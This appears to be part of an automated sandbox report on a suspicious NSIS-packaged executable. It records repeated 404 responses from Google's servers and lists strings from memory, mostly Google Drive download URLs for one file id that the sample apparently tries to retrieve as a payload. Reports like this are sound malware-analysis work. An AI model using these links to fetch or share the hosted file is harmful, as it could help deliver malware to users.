Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTd1oh0CeG3SntJIAMucCv06f67M_PPPTn5vno-zG6Nbfmyn1JbP3aW7flbsMu7y4cIOW-IOcoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:48:21 GMTContent-Security-Policy: script-src 'nonce-_rEI8luldQgxoQuGXZzoFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTAqe29_ykAqMNRjInn42S0g0xlQpRHb8VoYHkijIeYPobs8UlIQgFc8B2q8J3iDkVfContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:48:33 GMTContent-Security-Policy: script-src 'nonce-nMPm-yEITdWDIAlLrx1YtQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRotL0hzNxVtacOlIu-mrzqDaSJJr5uUHv_zWNmWsThyzkAemB-o63QlKopG0JxcxzkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:48:45 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-WgKGoPgOHUz9qZpUkxGPaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC66S50jI2fHwrI6ZGTYKvhwbsVLEXxscAYaXG-Sgp0AeVvVK0pH06-l-7aNY4rxunlpkShV0LMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:48:58 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-C3TtbhlhJj5WAQk_IbEDag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSCJ0CEuzDYm6Klb4lrXOsf8cKvccB7_q787hIwO3Dj8GnFgROR19xNdvHpd4WG1yozSIXegqgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:49:10 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-JJ1laMfvhX3zc0zHtcBuEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSy1U1zotXclJKC8czv1cIajmNFNncshnkwjJpZgsrD17TNyGawu3-Ad9UPCsPJV0vftJSPSjoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:49:22 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-YVPSMvVXLn1tEjwt4znyMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: fTSt7dc60O.exe, 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmp, fTSt7dc60O.exe, 00000000.00000000.1304762814.0000000000409000.00000008.00000001.01000000.00000003.sdmp, fTSt7dc60O.exe, 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=d
      Source: fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/$
      Source: fTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/0
      Source: fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/EveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
      Source: fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/EveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadFB
      Source: fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/EveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadW
      Source: fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/EveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloade
      Source: fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/EveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadgoogl
      Source: fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/EveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadofD
      Source: fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/EveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadt
      Source: fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/crosoft
      Source: fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
      Source: fTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1674532367.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/g
      Source: fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=do
      Source: fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rt
      Source: fTSt7dc60O.exe, 00000002.00000003.2782922250.00000000071A4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ
      Source: fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ-LRbwbJdNQXDVmZ
      Source: fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ-LRbwbJdNQXDVmZY5O&
      Source: fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZP
      Source: fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071A4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906189082.00000000071A4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2782922250.00000000071A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZWa
      Source: fTSt7dc60O.exe, 00000002.00000003.2782922250.00000000071A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ_
      Source: fTSt7dc60O.exe, 00000002.00000003.2906189082.00000000071A4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2782922250.00000000071A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZkc
      Source: fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1674532367.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1917391196.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1563404234.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: fTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1563473880.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1674532367.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1563404234.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/S
      Source: fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
      Source: fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download1
      Source: fTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download3g
      Source: fTSt7dc60O.exe, 00000002.00000002.3160639426.0000000007168000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download5
